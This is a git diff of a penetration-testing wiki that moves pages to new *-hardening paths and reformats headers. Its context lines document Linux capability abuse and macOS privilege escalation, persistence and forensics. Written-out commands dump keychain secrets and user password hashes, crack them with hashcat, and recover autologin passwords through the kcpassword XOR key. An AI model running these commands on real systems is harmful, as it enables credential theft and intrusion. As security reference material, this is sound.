[electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md)
{% endcontent-ref %}
-# CAP\_NET\_BIND\_SERVICE
+## CAP\_NET\_BIND\_SERVICE
**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability.
@@ -1385,7 +1386,7 @@ s.connect(('10.10.10.10',500))
{% endtab %}
{% endtabs %}
-# CAP\_NET\_RAW
+## CAP\_NET\_RAW
[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to be able to **create RAW and PACKET socket types** for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device which may allow for a malicious or **compromised container** to **spoof** **packets** at various network layers. A malicious process or compromised container with this capability may inject into upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.
@@ -1450,7 +1451,7 @@ while True:
count=count+1
```
-# CAP\_NET\_ADMIN + CAP\_NET\_RAW
+## CAP\_NET\_ADMIN + CAP\_NET\_RAW
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
@@ -1470,7 +1471,7 @@ import iptc
iptc.easy.flush_table('filter')
```
-# CAP\_LINUX\_IMMUTABLE
+## CAP\_LINUX\_IMMUTABLE
**This means that it's possible modify inode attributes.** You cannot escalate privileges directly with this capability.
@@ -1510,20 +1511,20 @@ sudo chattr -i file.txt
```
{% endhint %}
-# CAP\_SYS\_CHROOT
+## CAP\_SYS\_CHROOT
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
* [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
* [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
-# CAP\_SYS\_BOOT
+## CAP\_SYS\_BOOT
[**CAP\_SYS\_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows to use the `reboot(2)` syscall. It also allows for executing an arbitrary **reboot command** via `LINUX_REBOOT_CMD_RESTART2`, implemented for some specific hardware platforms.
This capability also permits use of the `kexec_load(2)` system call, which loads a new crash kernel and as of Linux 3.17, the `kexec_file_load(2)` which also will load signed kernels.
-# CAP\_SYSLOG
+## CAP\_SYSLOG
[CAP\_SYSLOG](https://man7.org/linux/man-pages/man7/capabilities.7.html) was finally forked in Linux 2.6.37 from the `CAP_SYS_ADMIN` catchall, this capability allows the process to use the `syslog(2)` system call. This also allows the process to view kernel addresses exposed via `/proc` and other interfaces when `/proc/sys/kernel/kptr_restrict` is set to 1.
@@ -1531,7 +1532,7 @@ The `kptr_restrict` sysctl setting was introduced in 2.6.38, and determines if k
In addition, this capability also allows the process to view `dmesg` output, if the `dmesg_restrict` setting is 1. Finally, the `CAP_SYS_ADMIN` capability is still permitted to perform `syslog` operations itself for historical reasons.
-# References
+## References
**Most of these examples were taken from some labs of** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), so if you want to practice this privesc techniques I recommend these labs.
diff --git a/linux-unix/privilege-escalation/logstash.md b/linux-hardening/privilege-escalation/logstash.md
similarity index 100%
rename from linux-unix/privilege-escalation/logstash.md
rename to linux-hardening/privilege-escalation/logstash.md
diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
similarity index 100%
rename from linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
rename to linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
diff --git a/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md b/linux-hardening/privilege-escalation/pam-pluggable-authentication-modules.md
similarity index 100%
rename from linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md
rename to linux-hardening/privilege-escalation/pam-pluggable-authentication-modules.md
diff --git a/linux-unix/privilege-escalation/payloads-to-execute.md b/linux-hardening/privilege-escalation/payloads-to-execute.md
similarity index 100%
rename from linux-unix/privilege-escalation/payloads-to-execute.md
rename to linux-hardening/privilege-escalation/payloads-to-execute.md
diff --git a/linux-unix/privilege-escalation/runc-privilege-escalation.md b/linux-hardening/privilege-escalation/runc-privilege-escalation.md
similarity index 93%
rename from linux-unix/privilege-escalation/runc-privilege-escalation.md
rename to linux-hardening/privilege-escalation/runc-privilege-escalation.md
index e1d9a52b..32515c56 100644
--- a/linux-unix/privilege-escalation/runc-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/runc-privilege-escalation.md
@@ -1,4 +1,4 @@
-
+# RunC Privilege Escalation
-
-
diff --git a/linux-unix/privilege-escalation/selinux.md b/linux-hardening/privilege-escalation/selinux.md
similarity index 100%
rename from linux-unix/privilege-escalation/selinux.md
rename to linux-hardening/privilege-escalation/selinux.md
diff --git a/linux-unix/privilege-escalation/socket-command-injection.md b/linux-hardening/privilege-escalation/socket-command-injection.md
similarity index 100%
rename from linux-unix/privilege-escalation/socket-command-injection.md
rename to linux-hardening/privilege-escalation/socket-command-injection.md
diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
similarity index 100%
rename from linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
rename to linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
similarity index 100%
rename from linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
rename to linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
similarity index 100%
rename from linux-unix/privilege-escalation/wildcards-spare-tricks.md
rename to linux-hardening/privilege-escalation/wildcards-spare-tricks.md
diff --git a/linux-unix/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md
similarity index 100%
rename from linux-unix/useful-linux-commands/README.md
rename to linux-hardening/useful-linux-commands/README.md
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
similarity index 100%
rename from linux-unix/useful-linux-commands/bypass-bash-restrictions.md
rename to linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
diff --git a/macos/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
similarity index 94%
rename from macos/macos-security-and-privilege-escalation/README.md
rename to macos-hardening/macos-security-and-privilege-escalation/README.md
index 3bec12d0..770a3745 100644
--- a/macos/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -1,4 +1,4 @@
-
+# MacOS Security & Privilege Escalation
.noindex`**: Files and folder with this extension won't be indexed by Spotlight.
-* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV`**2: Contains information about downloaded files, like the URL from where they were downloaded.
+* \*\*`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV`\*\*2: Contains information about downloaded files, like the URL from where they were downloaded.
* **`/var/log/system.log`**: Main log of OSX systems. com.apple.syslogd.plist is responsible for the execution of syslogging (you can check if it's disabled looking for "com.apple.syslogd" in `launchctl list`.
* **`/private/var/log/asl/*.asl`**: These are the Apple System Logs which may contain interesting information.
* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stores recently accessed files and applications through "Finder".
@@ -87,9 +85,9 @@ First of all, please note that **most of the tricks about privilege escalation a
* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: List of daemons deactivated.
* **`/private/etc/kcpassword`**: If autologin is enabled this file will contain the users login password XORed with a key.
-## Common users
+### Common users
-* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_":
+* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_":
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
@@ -99,14 +97,14 @@ First of all, please note that **most of the tricks about privilege escalation a
* **Nobody**: Processes are executed with this user when minimal permissions are required
* **Root**
-## User Privileges
+### User Privileges
* **Standard User:** The most basic of users. This user needs permissions granted from an admin user when attempting to install software or perform other advanced tasks. They are not able to do it on their own.
* **Admin User**: A user who operates most of the time as a standard user but is also allowed to perform root actions such as install software and other administrative tasks. All users belonging to the admin group are **given access to root via the sudoers file**.
* **Root**: Root is a user allowed to perform almost any action (there are limitations imposed by protections like System Integrity Protection).
* For example root won't be able to place a file inside `/System`
-## **File ACLs**
+### **File ACLs**
When the file contains ACLs you will **find a "+" when listing the permissions like in**:
@@ -129,7 +127,7 @@ You can find **all the files with ACLs** with (this is veeery slow):
ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
```
-## Resource Forks or MacOS ADS
+### Resource Forks or MacOS ADS
This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**.
@@ -150,7 +148,7 @@ You can **find all the files containing this extended attribute** with:
find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
```
-## Risk Files Mac OS
+### Risk Files Mac OS
The files `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` contains the risk associated to files depending on the file extension.
@@ -161,7 +159,7 @@ The possible categories include the following:
* **LSRiskCategoryUnsafeExecutable**: **Triggers** a **warning** “This file is an application...”
* **LSRiskCategoryMayContainUnsafeExecutable**: This is for things like archives that contain an executable. It **triggers a warning unless Safari can determine all the contents are safe or neutral**.
-## Remote Access Services
+### Remote Access Services
You can enable/disable these services in "System Preferences" --> Sharing
@@ -182,51 +180,51 @@ bmM=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.4488" | wc -l);
printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
```
-## MacOS Architecture
+### MacOS Architecture
{% content-ref url="mac-os-architecture.md" %}
[mac-os-architecture.md](mac-os-architecture.md)
{% endcontent-ref %}
-## MacOS Serial Number
+### MacOS Serial Number
{% content-ref url="macos-serial-number.md" %}
[macos-serial-number.md](macos-serial-number.md)
{% endcontent-ref %}
-## MacOS MDM
+### MacOS MDM
{% content-ref url="macos-mdm/" %}
[macos-mdm](macos-mdm/)
{% endcontent-ref %}
-## MacOS Protocols
+### MacOS Protocols
{% content-ref url="macos-protocols.md" %}
[macos-protocols.md](macos-protocols.md)
{% endcontent-ref %}
-## MacOS - Inspecting, Debugging and Fuzzing
+### MacOS - Inspecting, Debugging and Fuzzing
{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing.md" %}
[macos-apps-inspecting-debugging-and-fuzzing.md](macos-apps-inspecting-debugging-and-fuzzing.md)
{% endcontent-ref %}
-# MacOS Security Mechanisms
+## MacOS Security Mechanisms
-## Gatekeeper
+### Gatekeeper
[**In this talk**](https://www.youtube.com/watch?v=T5xfL9tEg44) Jeremy Brown talks about this protections and a bug that allowed to bypass them.
_**Gatekeeper**_ is designed to ensure that, by default, **only trusted software runs on a user’s Mac**. Gatekeeper is used when a user **downloads** and **opens** an app, a plug-in or an installer package from outside the App Store. Gatekeeper verifies that the software is **signed by** an **identified developer**, is **notarised** by Apple to be **free of known malicious content**, and **hasn’t been altered**. Gatekeeper also **requests user approval** before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.
-## Notarizing
+### Notarizing
In order for an **app to be notarised by Apple**, the developer needs to send the app for review. Notarization is **not App Review**. The Apple notary service is an **automated system** that **scans your software for malicious content**, checks for code-signing issues, and returns the results to you quickly. If there are no issues, the notary service generates a ticket for you to staple to your software; the notary service also **publishes that ticket online where Gatekeeper can find it**.
When the user first installs or runs your software, the presence of a ticket (either online or attached to the executable) **tells Gatekeeper that Apple notarized the software**. **Gatekeeper then places descriptive information in the initial launch dialog** indicating that Apple has already checked for malicious content.
-## File Quarantine
+### File Quarantine
Gatekeeper builds upon **File Quarantine.**\
Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\
@@ -287,7 +285,7 @@ And find all the quarantined files with:
find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"
```
-## XProtect
+### XProtect
**X-Protect** is also part of Gatekeeper. **It's Apple’s built in malware scanner.** It keeps track of known malware hashes and patterns.\
You can get information about the latest XProtect update running:
@@ -296,15 +294,15 @@ You can get information about the latest XProtect update running:
system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5
```
-## MRT: Malware Removal Tool
+### MRT: Malware Removal Tool
Should malware make its way onto a Mac, macOS also includes technology to remediate infections. The _Malware Removal Tool (MRT)_ is an engine in macOS that remediates infections based on updates automatically delivered from Apple (as part of automatic updates of system data files and security updates). **MRT removes malware upon receiving updated information** and it continues to check for infections on restart and login. MRT doesn’t automatically reboot the Mac. (From [here](https://support.apple.com/en-gb/guide/security/sec469d47bd8/web#:\~:text=The%20Malware%20Removal%20Tool%20\(MRT,data%20files%20and%20security%20updates\).))
-## Automatic Security Updates
+### Automatic Security Updates
Apple issues the **updates for XProtect and MRT automatically** based on the latest threat intelligence available. By default, macOS checks for these updates **daily**. Notarisation updates are distributed using CloudKit sync and are much more frequent.
-## TCC
+### TCC
**TCC (Transparency, Consent, and Control)** is a mechanism in macOS to **limit and control application access to certain features**, usually from a privacy perspective. This can include things such as location services, contacts, photos, microphone, camera, accessibility, full disk access, and a bunch more.
@@ -332,7 +330,7 @@ Unprotected directories:
* $HOME/.ssh, $HOME/.aws, etc
* /tmp
-### Bypasses
+#### Bypasses
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
@@ -342,7 +340,7 @@ Here you can find examples of how some **malwares have been able to bypass this
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
-## Seatbelt Sandbox
+### Seatbelt Sandbox
MacOS Sandbox works with the kernel extension Seatbelt. It makes applications run inside the sandbox **need to request access to resources outside of the limited sandbox**. This helps to ensure that **the application will be accessing only expected resources** and if it wants to access anything else it will need to ask for permissions to the user.
@@ -363,7 +361,7 @@ Bypasses examples:
* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (they are able to write files outside the sandbox whose name starts with `~$`).
-## SIP - System Integrity Protection
+### SIP - System Integrity Protection
This protection was enabled to **help keep root level malware from taking over certain parts** of the operating system. Although this means **applying limitations to the root user** many find it to be worthwhile trade off.\
The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general:
@@ -399,7 +397,7 @@ ls -lO /System/Library/LaunchDaemons/com.apple.UpdateSettings.plist
-rw-r--r--@ 1 root wheel restricted,compressed 412 1 Jan 2020 /System/Library/LaunchDaemons/com.apple.UpdateSettings.plist
```
-**SIP** handles a number of **other limitations as well**. Like it **doesn't allows for the loading of unsigned kexts**. SIP is also responsible for **ensuring** that no OS X **system processes are debugged**. This also means that Apple put a stop to dtrace inspecting system processes.
+**SIP** handles a number of **other limitations as well**. Like it **doesn't allows for the loading of unsigned kexts**. SIP is also responsible for **ensuring** that no OS X **system processes are debugged**. This also means that Apple put a stop to dtrace inspecting system processes.
Check if SIP is enabled with:
@@ -408,7 +406,7 @@ csrutil status
System Integrity Protection status: enabled.
```
-If you want to **disable** **it**, you need to put the computer in recovery mode (start it pressing command+R) and execute: `csrutil disable` \
+If you want to **disable** **it**, you need to put the computer in recovery mode (start it pressing command+R) and execute: `csrutil disable`\
You can also maintain it **enable but without debugging protections** doing:
```bash
@@ -419,7 +417,7 @@ For more **information about SIP** read the following response: [https://apple.s
This post about a **SIP bypass vulnerability** is also very interesting: [https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/](https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)
-## Apple Binary Signatures
+### Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
@@ -434,7 +432,7 @@ codesign --verify --verbose /Applications/Safari.app
spctl --assess --verbose /Applications/Safari.app
```
-# Installed Software & Services
+## Installed Software & Services
Check for **suspicious** applications installed and **privileges** over the.installed resources:
@@ -445,7 +443,7 @@ lsappinfo list #Installed Apps
launchtl list #Services
```
-# User Processes
+## User Processes
```bash
# will print all the running services under that particular user domain.
@@ -458,11 +456,11 @@ launchctl print system
launchctl print gui//com.company.launchagent.label
```
-# Auto Start Extensibility Point (ASEP)
+## Auto Start Extensibility Point (ASEP)
An **ASEP** is a location on the system that could lead to the **execution** of a binary **without** **user** **interaction**. The main ones used in OS X take the form of plists.
-## Launchd
+### Launchd
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
@@ -513,7 +511,7 @@ List all the agents and daemons loaded by the current user:
launchctl list
```
-## Cron
+### Cron
List the cron jobs of the **current user** with:
@@ -531,7 +529,7 @@ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
-## kext
+### kext
In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**:
@@ -552,9 +550,9 @@ kextunload -b com.apple.driver.ExampleBundle
For more information about [**kernel extensions check this section**](mac-os-architecture.md#i-o-kit-drivers).
-## **Login Items**
+### **Login Items**
-In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
+In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
It it's possible to list them, add and remove from the command line:
```bash
@@ -570,7 +568,7 @@ osascript -e 'tell application "System Events" to delete login item "itemname"'
These items are stored in the file /Users/\/Library/Application Support/com.apple.backgroundtaskmanagementagent
-## At
+### At
“At tasks” are used to **schedule tasks at specific times**.\
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
@@ -589,7 +587,7 @@ echo hello > /tmp/hello | at 1337
If AT tasks aren't enabled the created tasks won't be executed.
-## Login/Logout Hooks
+### Login/Logout Hooks
They are deprecated but can be used to execute commands when a user logs in.
@@ -625,7 +623,7 @@ In the previous example we have created and deleted a **LoginHook**, it's also p
The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
-## Emond
+### Emond
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
@@ -639,7 +637,7 @@ ls -l /private/var/db/emondClients
**As this isn't used much, anything in that folder should be suspicious**
{% endhint %}
-## Startup Items
+### Startup Items
{% hint style="danger" %}
**This is deprecated, so nothing should be found in the following directories.**
@@ -689,7 +687,7 @@ RunService "$1"
```
{% endcode %}
-## /etc/rc.common
+### /etc/rc.common
{% hint style="danger" %}
**This isn't working in modern MacOS versions**
@@ -790,7 +788,7 @@ RunService ()
}
```
-## Profiles
+### Profiles
Configuration profiles can force a user to use certain browser settings, DNS proxy settings, or VPN settings. Many other payloads are possible which make them ripe for abuse.
@@ -800,14 +798,14 @@ You can enumerate them running:
ls -Rl /Library/Managed\ Preferences/
```
-## Other persistence techniques and tools
+### Other persistence techniques and tools
* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
-# Memory Artifacts
+## Memory Artifacts
-## Swap Files
+### Swap Files
* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on.
* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off.
@@ -816,7 +814,7 @@ ls -Rl /Library/Managed\ Preferences/
* However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`.
-## Dumping memory with osxpmem
+### Dumping memory with osxpmem
In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
@@ -846,9 +844,9 @@ sudo su
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
-# Passwords
+## Passwords
-## Shadow Passwords
+### Shadow Passwords
Shadow password is stored withe the users configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**.\
The following oneliner can be use to dump **all the information about the users** (including hash info):
@@ -859,7 +857,7 @@ for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"
[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**.
-## Keychain Dump
+### Keychain Dump
Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation.
@@ -872,7 +870,7 @@ security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychain
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
```
-## [Keychaindump](https://github.com/juuso/keychaindump)
+### [Keychaindump](https://github.com/juuso/keychaindump)
The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function.
@@ -892,7 +890,7 @@ sudo ./keychaindump
Base on this comment [https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like this tools isn't working anymore in Big Sur.
{% endhint %}
-## chainbreaker
+### chainbreaker
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner:
@@ -909,14 +907,14 @@ Given the keychain unlock password, a master key obtained using [volafox](https:
Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information.
-### Dump keychain keys
+#### Dump keychain keys
```bash
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
```
-### Dump keychain keys (with passwords) with SystemKey
+#### Dump keychain keys (with passwords) with SystemKey
```bash
# First, get the keychain decryption key
@@ -926,7 +924,7 @@ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-### Dump keychain keys (with passwords) cracking the hash
+#### Dump keychain keys (with passwords) cracking the hash
```bash
# Get the keychain hash
@@ -937,7 +935,7 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-### Dump keychain keys (with passwords) with memory dump
+#### Dump keychain keys (with passwords) with memory dump
[Follow these steps](./#dumping-memory-with-osxpmem) to perform a **memory dump**
@@ -950,7 +948,7 @@ python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-### Dump keychain keys (with passwords) using users password
+#### Dump keychain keys (with passwords) using users password
If you know the users password you can use it to **dump and decrypt keychains that belong to the user**.
@@ -959,16 +957,16 @@ If you know the users password you can use it to **dump and decrypt keychains th
python2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db
```
-## kcpassword
+### kcpassword
The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure).
The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused.\
This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d).
-# **Library injection**
+## **Library injection**
-## Dylib Hijacking
+### Dylib Hijacking
As in Windows, in MacOS you can also **hijack dylibs** to make **applications** **execute** **arbitrary** **code**.\
However, the way **MacOS** applications **load** libraries is **more restricted** than in Windows. This implies that **malware** developers can still use this technique for **stealth**, but the probably to be able to **abuse this to escalate privileges is much lower**.
@@ -986,11 +984,11 @@ The way to **escalate privileges** abusing this functionality would be in the ra
**A nice scanner to find missing libraries in applications is** [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) **or a** [**CLI version**](https://github.com/pandazheng/DylibHijack)**.**\
**A nice report with technical details about this technique can be found** [**here**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)**.**
-## **DYLD\_INSERT\_LIBRARIES**
+### **DYLD\_INSERT\_LIBRARIES**
> This is a colon separated **list of dynamic libraries** to l**oad before the ones specified in the program**. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules. Note that this has no effect on images built a two-level namespace images using a dynamic shared library unless DYLD\_FORCE\_FLAT\_NAMESPACE is also used.
-This is like the [**LD\_PRELOAD on Linux**](../../linux-unix/privilege-escalation/#ld\_preload).
+This is like the [**LD\_PRELOAD on Linux**](../../linux-hardening/privilege-escalation/#ld\_preload).
This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`.
@@ -1002,9 +1000,9 @@ For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES enviro
For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)”
{% endhint %}
-# Interesting Information in Databases
+## Interesting Information in Databases
-## Messages
+### Messages
```bash
sqlite3 $HOME/Library/Messages/chat.db .tables
@@ -1014,7 +1012,7 @@ sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
```
-## Notifications
+### Notifications
You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
@@ -1025,7 +1023,7 @@ cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
```
-## Notes
+### Notes
The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
